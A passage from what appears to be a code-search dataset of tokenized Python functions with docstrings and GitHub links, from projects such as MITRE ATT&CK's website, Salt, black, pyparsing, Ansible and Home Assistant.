if domain['location'].startswith("http"):
stix_json = requests.get(domain['location'], verify=False, proxies=proxyDict)
if stix_json.status_code == 200:
stix_json = stix_json.json()
ms[domain['name']] = stix2.MemoryStore(stix_data=stix_json['objects'])
elif stix_json.status_code == 404:
exit(f"\n{domain['location']} stix bundle was not found")
else:
exit(f"\n{domain['location']} stix bundle download was unsuccessful")
else:
if os.path.exists(domain['location']):
ms[domain['name']] = stix2.MemoryStore()
ms[domain['name']].load_from_file(domain['location'])
else:
exit(f"\n{domain['location']} local file does not exist. If you intended a URL, please include http:// or https://")
if not domain['deprecated']:
srcs.append(ms[domain['name']])
return ms, srcs
|
[
"def",
"get_stix_memory_stores",
"(",
")",
":",
"# suppress InsecureRequestWarning: Unverified HTTPS request is being made",
"urllib3",
".",
"disable_warnings",
"(",
"urllib3",
".",
"exceptions",
".",
"InsecureRequestWarning",
")",
"ms",
"=",
"{",
"}",
"srcs",
"=",
"[",
"]",
"# Set proxy",
"proxy",
"=",
"\"\"",
"if",
"site_config",
".",
"args",
".",
"proxy",
":",
"proxy",
"=",
"site_config",
".",
"args",
".",
"proxy",
"proxyDict",
"=",
"{",
"\"http\"",
":",
"proxy",
",",
"\"https\"",
":",
"proxy",
"}",
"for",
"domain",
"in",
"site_config",
".",
"domains",
":",
"# Download json from http or https",
"if",
"domain",
"[",
"'location'",
"]",
".",
"startswith",
"(",
"\"http\"",
")",
":",
"stix_json",
"=",
"requests",
".",
"get",
"(",
"domain",
"[",
"'location'",
"]",
",",
"verify",
"=",
"False",
",",
"proxies",
"=",
"proxyDict",
")",
"if",
"stix_json",
".",
"status_code",
"==",
"200",
":",
"stix_json",
"=",
"stix_json",
".",
"json",
"(",
")",
"ms",
"[",
"domain",
"[",
"'name'",
"]",
"]",
"=",
"stix2",
".",
"MemoryStore",
"(",
"stix_data",
"=",
"stix_json",
"[",
"'objects'",
"]",
")",
"elif",
"stix_json",
".",
"status_code",
"==",
"404",
":",
"exit",
"(",
"f\"\\n{domain['location']} stix bundle was not found\"",
")",
"else",
":",
"exit",
"(",
"f\"\\n{domain['location']} stix bundle download was unsuccessful\"",
")",
"else",
":",
"if",
"os",
".",
"path",
".",
"exists",
"(",
"domain",
"[",
"'location'",
"]",
")",
":",
"ms",
"[",
"domain",
"[",
"'name'",
"]",
"]",
"=",
"stix2",
".",
"MemoryStore",
"(",
")",
"ms",
"[",
"domain",
"[",
"'name'",
"]",
"]",
".",
"load_from_file",
"(",
"domain",
"[",
"'location'",
"]",
")",
"else",
":",
"exit",
"(",
"f\"\\n{domain['location']} local file does not exist. If you intended a URL, please include http:// or https://\"",
")",
"if",
"not",
"domain",
"[",
"'deprecated'",
"]",
":",
"srcs",
".",
"append",
"(",
"ms",
"[",
"domain",
"[",
"'name'",
"]",
"]",
")",
"return",
"ms",
",",
"srcs"
] |
https://github.com/mitre-attack/attack-website/blob/446748b71f412f7125d596a5eae0869559c89f05/modules/util/stixhelpers.py#L374-L416
|
|
Staffjoy/suite
|
14ed49b21cf8296d2e0696a7f50f91f8e4b65072
|
staffjoy/resource.py
|
python
|
Resource._delay_for_ratelimits
|
(cls, start)
|
If request was shorter than max request time, delay
|
If request was shorter than max request time, delay
|
[
"If",
"request",
"was",
"shorter",
"than",
"max",
"request",
"time",
"delay"
] |
def _delay_for_ratelimits(cls, start):
"""If request was shorter than max request time, delay"""
stop = datetime.now()
duration_microseconds = (stop-start).microseconds
if duration_microseconds < cls.REQUEST_TIME_MICROSECONDS:
time.sleep((cls.REQUEST_TIME_MICROSECONDS - duration_microseconds) / MICROSECONDS_PER_SECOND)
|
[
"def",
"_delay_for_ratelimits",
"(",
"cls",
",",
"start",
")",
":",
"stop",
"=",
"datetime",
".",
"now",
"(",
")",
"duration_microseconds",
"=",
"(",
"stop",
"-",
"start",
")",
".",
"microseconds",
"if",
"duration_microseconds",
"<",
"cls",
".",
"REQUEST_TIME_MICROSECONDS",
":",
"time",
".",
"sleep",
"(",
"(",
"cls",
".",
"REQUEST_TIME_MICROSECONDS",
"-",
"duration_microseconds",
")",
"/",
"MICROSECONDS_PER_SECOND",
")"
] |
https://github.com/Staffjoy/suite/blob/14ed49b21cf8296d2e0696a7f50f91f8e4b65072/staffjoy/resource.py#L202-L207
|
||
saltstack/salt
|
fae5bc757ad0f1716483ce7ae180b451545c2058
|
salt/modules/netaddress.py
|
python
|
list_cidr_ips
|
(cidr)
|
return [str(ip) for ip in list(ips)]
|
Get a list of IP addresses from a CIDR.
CLI Example:
.. code-block:: bash
salt myminion netaddress.list_cidr_ips 192.168.0.0/20
|
Get a list of IP addresses from a CIDR.
|
[
"Get",
"a",
"list",
"of",
"IP",
"addresses",
"from",
"a",
"CIDR",
"."
] |
def list_cidr_ips(cidr):
"""
Get a list of IP addresses from a CIDR.
CLI Example:
.. code-block:: bash
salt myminion netaddress.list_cidr_ips 192.168.0.0/20
"""
ips = netaddr.IPNetwork(cidr)
return [str(ip) for ip in list(ips)]
|
[
"def",
"list_cidr_ips",
"(",
"cidr",
")",
":",
"ips",
"=",
"netaddr",
".",
"IPNetwork",
"(",
"cidr",
")",
"return",
"[",
"str",
"(",
"ip",
")",
"for",
"ip",
"in",
"list",
"(",
"ips",
")",
"]"
] |
https://github.com/saltstack/salt/blob/fae5bc757ad0f1716483ce7ae180b451545c2058/salt/modules/netaddress.py#L33-L44
|
|
CreatCodeBuild/TensorFlow-and-DeepLearning-Tutorial
|
b418e9dc381a908b9cb7a3038825b6eb276b98cd
|
Season1/4-6/load.py
|
python
|
normalize
|
(samples)
|
return a/128.0 - 1.0
|
并且灰度化: 从三色通道 -> 单色通道 省内存 + 加快训练速度
(R + G + B) / 3
将图片从 0 ~ 255 线性映射到 -1.0 ~ +1.0
@samples: numpy array
|
并且灰度化: 从三色通道 -> 单色通道 省内存 + 加快训练速度
(R + G + B) / 3
将图片从 0 ~ 255 线性映射到 -1.0 ~ +1.0
|
[
"并且灰度化",
":",
"从三色通道",
"-",
">",
"单色通道",
"省内存",
"+",
"加快训练速度",
"(",
"R",
"+",
"G",
"+",
"B",
")",
"/",
"3",
"将图片从",
"0",
"~",
"255",
"线性映射到",
"-",
"1",
".",
"0",
"~",
"+",
"1",
".",
"0"
] |
def normalize(samples):
'''
并且灰度化: 从三色通道 -> 单色通道 省内存 + 加快训练速度
(R + G + B) / 3
将图片从 0 ~ 255 线性映射到 -1.0 ~ +1.0
@samples: numpy array
'''
a = np.add.reduce(samples, keepdims=True, axis=3) # shape (图片数,图片高,图片宽,通道数)
a = a/3.0
return a/128.0 - 1.0
|
[
"def",
"normalize",
"(",
"samples",
")",
":",
"a",
"=",
"np",
".",
"add",
".",
"reduce",
"(",
"samples",
",",
"keepdims",
"=",
"True",
",",
"axis",
"=",
"3",
")",
"# shape (图片数,图片高,图片宽,通道数)",
"a",
"=",
"a",
"/",
"3.0",
"return",
"a",
"/",
"128.0",
"-",
"1.0"
] |
https://github.com/CreatCodeBuild/TensorFlow-and-DeepLearning-Tutorial/blob/b418e9dc381a908b9cb7a3038825b6eb276b98cd/Season1/4-6/load.py#L29-L38
|
|
jazzband/django-celery-monitor
|
2b86acddc4cf2e65b63c8c7b2db7ecaa037b4b75
|
django_celery_monitor/managers.py
|
python
|
TaskStateQuerySet.purge
|
(self)
|
Purge all expired task states.
|
Purge all expired task states.
|
[
"Purge",
"all",
"expired",
"task",
"states",
"."
] |
def purge(self):
"""Purge all expired task states."""
with transaction.atomic():
self.using(
router.db_for_write(self.model)
).filter(hidden=True).delete()
|
[
"def",
"purge",
"(",
"self",
")",
":",
"with",
"transaction",
".",
"atomic",
"(",
")",
":",
"self",
".",
"using",
"(",
"router",
".",
"db_for_write",
"(",
"self",
".",
"model",
")",
")",
".",
"filter",
"(",
"hidden",
"=",
"True",
")",
".",
"delete",
"(",
")"
] |
https://github.com/jazzband/django-celery-monitor/blob/2b86acddc4cf2e65b63c8c7b2db7ecaa037b4b75/django_celery_monitor/managers.py#L86-L91
|
||
yogeshbalaji/Generate_To_Adapt
|
622d4984662b71bcdb88c33c5ac67e6ec8bad0ad
|
models.py
|
python
|
_netF.forward
|
(self, input)
|
return output.view(-1, 2*self.ndf)
|
[] |
def forward(self, input):
output = self.feature(input)
return output.view(-1, 2*self.ndf)
|
[
"def",
"forward",
"(",
"self",
",",
"input",
")",
":",
"output",
"=",
"self",
".",
"feature",
"(",
"input",
")",
"return",
"output",
".",
"view",
"(",
"-",
"1",
",",
"2",
"*",
"self",
".",
"ndf",
")"
] |
https://github.com/yogeshbalaji/Generate_To_Adapt/blob/622d4984662b71bcdb88c33c5ac67e6ec8bad0ad/models.py#L113-L115
|
|||
Dan-in-CA/SIP
|
7d08d807d7730bff2b5eaaa57e743665c8b143a6
|
web/utils.py
|
python
|
group
|
(seq, size)
|
return (seq[i : i + size] for i in range(0, len(seq), size))
|
Returns an iterator over a series of lists of length size from iterable.
>>> list(group([1,2,3,4], 2))
[[1, 2], [3, 4]]
>>> list(group([1,2,3,4,5], 2))
[[1, 2], [3, 4], [5]]
|
Returns an iterator over a series of lists of length size from iterable.
|
[
"Returns",
"an",
"iterator",
"over",
"a",
"series",
"of",
"lists",
"of",
"length",
"size",
"from",
"iterable",
"."
] |
def group(seq, size):
"""
Returns an iterator over a series of lists of length size from iterable.
>>> list(group([1,2,3,4], 2))
[[1, 2], [3, 4]]
>>> list(group([1,2,3,4,5], 2))
[[1, 2], [3, 4], [5]]
"""
return (seq[i : i + size] for i in range(0, len(seq), size))
|
[
"def",
"group",
"(",
"seq",
",",
"size",
")",
":",
"return",
"(",
"seq",
"[",
"i",
":",
"i",
"+",
"size",
"]",
"for",
"i",
"in",
"range",
"(",
"0",
",",
"len",
"(",
"seq",
")",
",",
"size",
")",
")"
] |
https://github.com/Dan-in-CA/SIP/blob/7d08d807d7730bff2b5eaaa57e743665c8b143a6/web/utils.py#L586-L595
|
|
AIworx-Labs/chocolate
|
0ba4f6f0130eab851d32d5534241c8cac3f6666e
|
chocolate/connection/sqlite.py
|
python
|
SQLiteConnection.all_complementary
|
(self)
|
return list(db[self.complementary_table_name].all())
|
Get all entries of the complementary information table as a list.
The order is undefined.
|
Get all entries of the complementary information table as a list.
The order is undefined.
|
[
"Get",
"all",
"entries",
"of",
"the",
"complementary",
"information",
"table",
"as",
"a",
"list",
".",
"The",
"order",
"is",
"undefined",
"."
] |
def all_complementary(self):
"""Get all entries of the complementary information table as a list.
The order is undefined.
"""
gc.collect()
db = dataset.connect(self.url)
return list(db[self.complementary_table_name].all())
|
[
"def",
"all_complementary",
"(",
"self",
")",
":",
"gc",
".",
"collect",
"(",
")",
"db",
"=",
"dataset",
".",
"connect",
"(",
"self",
".",
"url",
")",
"return",
"list",
"(",
"db",
"[",
"self",
".",
"complementary_table_name",
"]",
".",
"all",
"(",
")",
")"
] |
https://github.com/AIworx-Labs/chocolate/blob/0ba4f6f0130eab851d32d5534241c8cac3f6666e/chocolate/connection/sqlite.py#L154-L160
|
|
psf/black
|
33e3bb1e4e326713f85749705179da2e31520670
|
src/black/files.py
|
python
|
find_project_root
|
(srcs: Sequence[str])
|
return directory, "file system root"
|
Return a directory containing .git, .hg, or pyproject.toml.
That directory will be a common parent of all files and directories
passed in `srcs`.
If no directory in the tree contains a marker that would specify it's the
project root, the root of the file system is returned.
Returns a two-tuple with the first element as the project root path and
the second element as a string describing the method by which the
project root was discovered.
|
Return a directory containing .git, .hg, or pyproject.toml.
|
[
"Return",
"a",
"directory",
"containing",
".",
"git",
".",
"hg",
"or",
"pyproject",
".",
"toml",
"."
] |
def find_project_root(srcs: Sequence[str]) -> Tuple[Path, str]:
"""Return a directory containing .git, .hg, or pyproject.toml.
That directory will be a common parent of all files and directories
passed in `srcs`.
If no directory in the tree contains a marker that would specify it's the
project root, the root of the file system is returned.
Returns a two-tuple with the first element as the project root path and
the second element as a string describing the method by which the
project root was discovered.
"""
if not srcs:
srcs = [str(Path.cwd().resolve())]
path_srcs = [Path(Path.cwd(), src).resolve() for src in srcs]
# A list of lists of parents for each 'src'. 'src' is included as a
# "parent" of itself if it is a directory
src_parents = [
list(path.parents) + ([path] if path.is_dir() else []) for path in path_srcs
]
common_base = max(
set.intersection(*(set(parents) for parents in src_parents)),
key=lambda path: path.parts,
)
for directory in (common_base, *common_base.parents):
if (directory / ".git").exists():
return directory, ".git directory"
if (directory / ".hg").is_dir():
return directory, ".hg directory"
if (directory / "pyproject.toml").is_file():
return directory, "pyproject.toml"
return directory, "file system root"
|
[
"def",
"find_project_root",
"(",
"srcs",
":",
"Sequence",
"[",
"str",
"]",
")",
"->",
"Tuple",
"[",
"Path",
",",
"str",
"]",
":",
"if",
"not",
"srcs",
":",
"srcs",
"=",
"[",
"str",
"(",
"Path",
".",
"cwd",
"(",
")",
".",
"resolve",
"(",
")",
")",
"]",
"path_srcs",
"=",
"[",
"Path",
"(",
"Path",
".",
"cwd",
"(",
")",
",",
"src",
")",
".",
"resolve",
"(",
")",
"for",
"src",
"in",
"srcs",
"]",
"# A list of lists of parents for each 'src'. 'src' is included as a",
"# \"parent\" of itself if it is a directory",
"src_parents",
"=",
"[",
"list",
"(",
"path",
".",
"parents",
")",
"+",
"(",
"[",
"path",
"]",
"if",
"path",
".",
"is_dir",
"(",
")",
"else",
"[",
"]",
")",
"for",
"path",
"in",
"path_srcs",
"]",
"common_base",
"=",
"max",
"(",
"set",
".",
"intersection",
"(",
"*",
"(",
"set",
"(",
"parents",
")",
"for",
"parents",
"in",
"src_parents",
")",
")",
",",
"key",
"=",
"lambda",
"path",
":",
"path",
".",
"parts",
",",
")",
"for",
"directory",
"in",
"(",
"common_base",
",",
"*",
"common_base",
".",
"parents",
")",
":",
"if",
"(",
"directory",
"/",
"\".git\"",
")",
".",
"exists",
"(",
")",
":",
"return",
"directory",
",",
"\".git directory\"",
"if",
"(",
"directory",
"/",
"\".hg\"",
")",
".",
"is_dir",
"(",
")",
":",
"return",
"directory",
",",
"\".hg directory\"",
"if",
"(",
"directory",
"/",
"\"pyproject.toml\"",
")",
".",
"is_file",
"(",
")",
":",
"return",
"directory",
",",
"\"pyproject.toml\"",
"return",
"directory",
",",
"\"file system root\""
] |
https://github.com/psf/black/blob/33e3bb1e4e326713f85749705179da2e31520670/src/black/files.py#L34-L73
|
|
jgagneastro/coffeegrindsize
|
22661ebd21831dba4cf32bfc6ba59fe3d49f879c
|
App/venv/lib/python3.7/site-packages/pkg_resources/_vendor/pyparsing.py
|
python
|
ParserElement.__rand__
|
(self, other )
|
return other & self
|
Implementation of & operator when left operand is not a C{L{ParserElement}}
|
Implementation of & operator when left operand is not a C{L{ParserElement}}
|
[
"Implementation",
"of",
"&",
"operator",
"when",
"left",
"operand",
"is",
"not",
"a",
"C",
"{",
"L",
"{",
"ParserElement",
"}}"
] |
def __rand__(self, other ):
"""
Implementation of & operator when left operand is not a C{L{ParserElement}}
"""
if isinstance( other, basestring ):
other = ParserElement._literalStringClass( other )
if not isinstance( other, ParserElement ):
warnings.warn("Cannot combine element of type %s with ParserElement" % type(other),
SyntaxWarning, stacklevel=2)
return None
return other & self
|
[
"def",
"__rand__",
"(",
"self",
",",
"other",
")",
":",
"if",
"isinstance",
"(",
"other",
",",
"basestring",
")",
":",
"other",
"=",
"ParserElement",
".",
"_literalStringClass",
"(",
"other",
")",
"if",
"not",
"isinstance",
"(",
"other",
",",
"ParserElement",
")",
":",
"warnings",
".",
"warn",
"(",
"\"Cannot combine element of type %s with ParserElement\"",
"%",
"type",
"(",
"other",
")",
",",
"SyntaxWarning",
",",
"stacklevel",
"=",
"2",
")",
"return",
"None",
"return",
"other",
"&",
"self"
] |
https://github.com/jgagneastro/coffeegrindsize/blob/22661ebd21831dba4cf32bfc6ba59fe3d49f879c/App/venv/lib/python3.7/site-packages/pkg_resources/_vendor/pyparsing.py#L2008-L2018
|
|
ansible/ansible
|
4676c08f188fb5dca98df61630c76dba1f0d2d77
|
lib/ansible/module_utils/distro/_distro.py
|
python
|
LinuxDistribution._parse_distro_release_file
|
(self, filepath)
|
Parse a distro release file.
Parameters:
* filepath: Path name of the distro release file.
Returns:
A dictionary containing all information items.
|
Parse a distro release file.
|
[
"Parse",
"a",
"distro",
"release",
"file",
"."
] |
def _parse_distro_release_file(self, filepath):
# type: (str) -> Dict[str, str]
"""
Parse a distro release file.
Parameters:
* filepath: Path name of the distro release file.
Returns:
A dictionary containing all information items.
"""
try:
with open(filepath) as fp:
# Only parse the first line. For instance, on SLES there
# are multiple lines. We don't want them...
return self._parse_distro_release_content(fp.readline())
except (OSError, IOError):
# Ignore not being able to read a specific, seemingly version
# related file.
# See https://github.com/python-distro/distro/issues/162
return {}
|
[
"def",
"_parse_distro_release_file",
"(",
"self",
",",
"filepath",
")",
":",
"# type: (str) -> Dict[str, str]",
"try",
":",
"with",
"open",
"(",
"filepath",
")",
"as",
"fp",
":",
"# Only parse the first line. For instance, on SLES there",
"# are multiple lines. We don't want them...",
"return",
"self",
".",
"_parse_distro_release_content",
"(",
"fp",
".",
"readline",
"(",
")",
")",
"except",
"(",
"OSError",
",",
"IOError",
")",
":",
"# Ignore not being able to read a specific, seemingly version",
"# related file.",
"# See https://github.com/python-distro/distro/issues/162",
"return",
"{",
"}"
] |
https://github.com/ansible/ansible/blob/4676c08f188fb5dca98df61630c76dba1f0d2d77/lib/ansible/module_utils/distro/_distro.py#L1346-L1367
|
||
thearn/Python-Arduino-Command-API
|
610171b3ae153542aca42d354fbb26c32027f38f
|
examples.py
|
python
|
softBlink
|
(led_pin, baud, port="")
|
Fades an LED off and on, using
Arduino's analogWrite (PWM) function
|
Fades an LED off and on, using
Arduino's analogWrite (PWM) function
|
[
"Fades",
"an",
"LED",
"off",
"and",
"on",
"using",
"Arduino",
"s",
"analogWrite",
"(",
"PWM",
")",
"function"
] |
def softBlink(led_pin, baud, port=""):
"""
Fades an LED off and on, using
Arduino's analogWrite (PWM) function
"""
board = Arduino(baud, port=port)
i = 0
while True:
i += 1
k = i % 510
if k % 5 == 0:
if k > 255:
k = 510 - k
board.analogWrite(led_pin, k)
|
[
"def",
"softBlink",
"(",
"led_pin",
",",
"baud",
",",
"port",
"=",
"\"\"",
")",
":",
"board",
"=",
"Arduino",
"(",
"baud",
",",
"port",
"=",
"port",
")",
"i",
"=",
"0",
"while",
"True",
":",
"i",
"+=",
"1",
"k",
"=",
"i",
"%",
"510",
"if",
"k",
"%",
"5",
"==",
"0",
":",
"if",
"k",
">",
"255",
":",
"k",
"=",
"510",
"-",
"k",
"board",
".",
"analogWrite",
"(",
"led_pin",
",",
"k",
")"
] |
https://github.com/thearn/Python-Arduino-Command-API/blob/610171b3ae153542aca42d354fbb26c32027f38f/examples.py#L21-L34
|
||
idapython/src
|
839d93ac969bc1a152982464907445bc0d18a1f8
|
pywraps/py_kernwin_askform.py
|
python
|
Form.SetFocusedField
|
(self, ctrl)
|
return _ida_kernwin.formchgcbfa_set_focused_field(self.p_fa, ctrl.id)
|
Set currently focused input field
@return: False - no such control
|
Set currently focused input field
|
[
"Set",
"currently",
"focused",
"input",
"field"
] |
def SetFocusedField(self, ctrl):
"""
Set currently focused input field
@return: False - no such control
"""
return _ida_kernwin.formchgcbfa_set_focused_field(self.p_fa, ctrl.id)
|
[
"def",
"SetFocusedField",
"(",
"self",
",",
"ctrl",
")",
":",
"return",
"_ida_kernwin",
".",
"formchgcbfa_set_focused_field",
"(",
"self",
".",
"p_fa",
",",
"ctrl",
".",
"id",
")"
] |
https://github.com/idapython/src/blob/839d93ac969bc1a152982464907445bc0d18a1f8/pywraps/py_kernwin_askform.py#L1269-L1274
|
|
home-assistant/core
|
265ebd17a3f17ed8dc1e9bdede03ac8e323f1ab1
|
homeassistant/components/rpi_camera/camera.py
|
python
|
RaspberryCamera.__init__
|
(self, device_info)
|
Initialize Raspberry Pi camera component.
|
Initialize Raspberry Pi camera component.
|
[
"Initialize",
"Raspberry",
"Pi",
"camera",
"component",
"."
] |
def __init__(self, device_info):
"""Initialize Raspberry Pi camera component."""
super().__init__()
self._name = device_info[CONF_NAME]
self._config = device_info
# Kill if there's raspistill instance
kill_raspistill()
cmd_args = [
"raspistill",
"--nopreview",
"-o",
device_info[CONF_FILE_PATH],
"-t",
"0",
"-w",
str(device_info[CONF_IMAGE_WIDTH]),
"-h",
str(device_info[CONF_IMAGE_HEIGHT]),
"-tl",
str(device_info[CONF_TIMELAPSE]),
"-q",
str(device_info[CONF_IMAGE_QUALITY]),
"-rot",
str(device_info[CONF_IMAGE_ROTATION]),
]
if device_info[CONF_HORIZONTAL_FLIP]:
cmd_args.append("-hf")
if device_info[CONF_VERTICAL_FLIP]:
cmd_args.append("-vf")
if device_info[CONF_OVERLAY_METADATA]:
cmd_args.append("-a")
cmd_args.append(str(device_info[CONF_OVERLAY_METADATA]))
if device_info[CONF_OVERLAY_TIMESTAMP]:
cmd_args.append("-a")
cmd_args.append("4")
cmd_args.append("-a")
cmd_args.append(str(device_info[CONF_OVERLAY_TIMESTAMP]))
# The raspistill process started below must run "forever" in
# the background until killed when Home Assistant is stopped.
# Therefore it must not be wrapped with "with", since that
# waits for the subprocess to exit before continuing.
subprocess.Popen( # pylint: disable=consider-using-with
cmd_args, stdout=subprocess.DEVNULL, stderr=subprocess.STDOUT
)
|
[
"def",
"__init__",
"(",
"self",
",",
"device_info",
")",
":",
"super",
"(",
")",
".",
"__init__",
"(",
")",
"self",
".",
"_name",
"=",
"device_info",
"[",
"CONF_NAME",
"]",
"self",
".",
"_config",
"=",
"device_info",
"# Kill if there's raspistill instance",
"kill_raspistill",
"(",
")",
"cmd_args",
"=",
"[",
"\"raspistill\"",
",",
"\"--nopreview\"",
",",
"\"-o\"",
",",
"device_info",
"[",
"CONF_FILE_PATH",
"]",
",",
"\"-t\"",
",",
"\"0\"",
",",
"\"-w\"",
",",
"str",
"(",
"device_info",
"[",
"CONF_IMAGE_WIDTH",
"]",
")",
",",
"\"-h\"",
",",
"str",
"(",
"device_info",
"[",
"CONF_IMAGE_HEIGHT",
"]",
")",
",",
"\"-tl\"",
",",
"str",
"(",
"device_info",
"[",
"CONF_TIMELAPSE",
"]",
")",
",",
"\"-q\"",
",",
"str",
"(",
"device_info",
"[",
"CONF_IMAGE_QUALITY",
"]",
")",
",",
"\"-rot\"",
",",
"str",
"(",
"device_info",
"[",
"CONF_IMAGE_ROTATION",
"]",
")",
",",
"]",
"if",
"device_info",
"[",
"CONF_HORIZONTAL_FLIP",
"]",
":",
"cmd_args",
".",
"append",
"(",
"\"-hf\"",
")",
"if",
"device_info",
"[",
"CONF_VERTICAL_FLIP",
"]",
":",
"cmd_args",
".",
"append",
"(",
"\"-vf\"",
")",
"if",
"device_info",
"[",
"CONF_OVERLAY_METADATA",
"]",
":",
"cmd_args",
".",
"append",
"(",
"\"-a\"",
")",
"cmd_args",
".",
"append",
"(",
"str",
"(",
"device_info",
"[",
"CONF_OVERLAY_METADATA",
"]",
")",
")",
"if",
"device_info",
"[",
"CONF_OVERLAY_TIMESTAMP",
"]",
":",
"cmd_args",
".",
"append",
"(",
"\"-a\"",
")",
"cmd_args",
".",
"append",
"(",
"\"4\"",
")",
"cmd_args",
".",
"append",
"(",
"\"-a\"",
")",
"cmd_args",
".",
"append",
"(",
"str",
"(",
"device_info",
"[",
"CONF_OVERLAY_TIMESTAMP",
"]",
")",
")",
"# The raspistill process started below must run \"forever\" in",
"# the background until killed when Home Assistant is stopped.",
"# Therefore it must not be wrapped with \"with\", since that",
"# waits for the subprocess to exit before continuing.",
"subprocess",
".",
"Popen",
"(",
"# pylint: disable=consider-using-with",
"cmd_args",
",",
"stdout",
"=",
"subprocess",
".",
"DEVNULL",
",",
"stderr",
"=",
"subprocess",
".",
"STDOUT",
")"
] |
https://github.com/home-assistant/core/blob/265ebd17a3f17ed8dc1e9bdede03ac8e323f1ab1/homeassistant/components/rpi_camera/camera.py#L86-L136
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.